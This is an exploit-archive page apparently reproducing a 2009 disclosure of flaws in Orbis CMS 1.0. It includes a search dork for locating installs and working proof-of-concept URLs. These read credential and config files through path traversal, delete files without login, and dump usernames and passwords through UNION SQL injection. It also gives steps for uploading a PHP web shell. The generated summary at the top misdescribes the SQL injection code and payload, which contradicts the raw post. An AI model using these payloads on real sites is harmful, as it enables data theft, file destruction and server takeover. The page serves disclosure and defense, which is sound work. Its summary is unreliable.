Orbis CMS 1.0 (AFD/ADF/ASU/SQL) Multiple Remote Vulnerabilities

vendor:

Orbis CMS

by:

SirGod

7,5

CVSS

HIGH

Arbitrary File Download, Arbitrary Delete File, SQL Injection

89, 264, 564

CWE

Product Name: Orbis CMS

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:orbis_cms:orbis_cms:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Orbis CMS 1.0 (AFD/ADF/ASU/SQL) Multiple Remote Vulnerabilities

Orbis CMS 1.0 is vulnerable to Arbitrary File Download, Arbitrary Delete File, and SQL Injection. No login is required for Arbitrary File Download and Arbitrary Delete File. For SQL Injection, a login is required. The vulnerable code for Arbitrary File Download is header('Content-Type: application/force-download'); header('Content-Disposition: attachment; filename="'.basename($_GET['fn']).'"'); readfile($_GET['fn']); and for Arbitrary Delete File is $filename = $_GET['fn']; unlink($filename) or die("Couldn't delete ".$filename.". Please contact your web designer."); and for SQL Injection is $sql = "SELECT * FROM users WHERE username='".$_POST['username']."' AND password='".$_POST['password']."'". The PoC for Arbitrary File Download is http://127.0.0.1/[path]/admin/fileman_file_download.php?fn=../../../../../../../boot.ini and http://127.0.0.1/path/admin/fileman_file_download.php?fn=includes/config/db.php, for Arbitrary Delete File is http://127.0.0.1/[path]/admin/fileman_file_delete.php?fn=../uploads/example.jpg, and for SQL Injection is username : ' or 1=1-- and password : ' or 1=1--.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries. Use parameterized queries to prevent SQL injection.

Source

Exploit-DB raw data:

################################################################################################################################################
[+] Orbis CMS 1.0 (AFD/ADF/ASU/SQL) Multiple Remote Vulnerabilities
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
################################################################################################################################################

[+] Dork : Powered by Orbis CMS

[+] Download script : http://www.novo-ws.com/orbis-cms/download.shtml

[+]>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Arbitrary File
Download <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<[+]

 - No login required.

 - Vulnerable code in fileman_file_download.php

-----------------------------------------------------------------------------------
header('Content-Type: application/force-download');
header('Content-Disposition: attachment; filename="'.basename($_GET['fn']).'"');
readfile($_GET['fn']);
-----------------------------------------------------------------------------------

 - PoC's

    http://127.0.0.1/[path]/admin/fileman_file_download.php?fn=../../../../../../../boot.ini

    http://127.0.0.1/path/admin/fileman_file_download.php?fn=includes/config/db.php


[+]>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Arbitrary Delete
File <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<[+]

 - No login required.

 - Vulnerable code in fileman_file_delete.php

-----------------------------------------------------------------------------------------------
 $filename = $_GET['fn'];

 unlink($filename) or die("Couldn't delete ".$filename.". Please
contact your web designer.");
-----------------------------------------------------------------------------------------------

 - PoC

     http://127.0.0.1/[path]/admin/fileman_file_delete.php?fn=../uploads/example.jpg

[+]>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> SQL Injection
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<[+]

 - Login required.

 - Code from editor.php

---------------------------------------------
<?php require("includes/functions.php"); ?>
getSectionPage($_GET['s']);
----------------------------------- ----------

 - Vulnerable code in includes/functions.php

--------------------------------------------------------------------
function getSectionPage($id) {

 if(isset($id)) {
  require($_SESSION['inc_dir']."config/db.php");
  $sc=mysql_query('SELECT * FROM content WHERE id='.$id.'', $db);
--------------------------------------------------------------------

 - PoC

    http://127.0.0.1/[path]/admin/editor.php?s=null+union+all+select+1,2,3,4,5,concat_ws(0x3a,username,password)+from+security+where+user_id=1--&t=1


[+]>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Arbitrary Shell
Upload <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<[+]

 - Login required.


 1) Go to

      http://127.0.0.1/[path]/admin/fileman.php

 2) Select your shell and upload it

      shell.php

 3) You fill find your shell here

      http://127.0.0.1/[path]/uploads/shell.php

################################################################################################################################################

# milw0rm.com [2009-07-30]